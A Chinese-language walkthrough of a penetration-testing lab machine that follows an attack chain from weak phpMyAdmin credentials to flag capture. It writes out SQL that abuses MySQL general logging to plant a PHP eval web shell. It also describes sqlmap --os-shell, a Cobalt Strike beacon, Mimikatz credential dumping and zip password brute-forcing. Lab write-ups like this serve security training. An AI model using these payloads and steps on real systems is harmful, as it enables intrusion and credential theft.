渗透测试训练-靶机szp

前言

还是学弟扔来的靶场,利用点还是挺多的,不多说直接开搞就完了。还是直接导入ovf文件配置nat就可以了

phpmyadmin

​ 还是老样子不知道靶机的登陆密码,扫描得到ip为192.168.111.17,nmap扫描下端口信息,如下

访问80端口看下服务

web指纹扫描插件已经给出了该站点的相关信息

先来phpmyadmin打一波看,弱口令直接进去,这样一来web服务就像纸一样了,随便打了都。

然后使用file_into或日志写入webshell。

1
2
3
set global general_log=on; 开启日志
set global general_log_file='C:/phpstudy/www/ly0n.php'; 设置日志位置为根目录下;猜测路径
select '<?php @eval($_POST["ly0n"]); ?>'

蚁剑成功连接

ThinkPHP

​ 访问home看到一个站点,经过测试发现存在sql注入漏洞

然后sqlmap一把梭即可,还可以直接--os-shell

使用--os-shell生成的上传文件页面上传一句话

或者使用其生成的后门文件即可

在数据库配置文件内找到一个flag

上线CS

​ 生成攻击文件,设置监听。然后上传到目标机器运行,成功上线

执行Mimikatz抓取密码

密码为Vc6J4Rtv5jR,登陆靶机,在桌面上有一个flag-5.zip,猜测应该是一个五位数字的密码。进行爆破就可以了。最后爆破出来的密码是37201,解压即可拿到第二个flag

结束!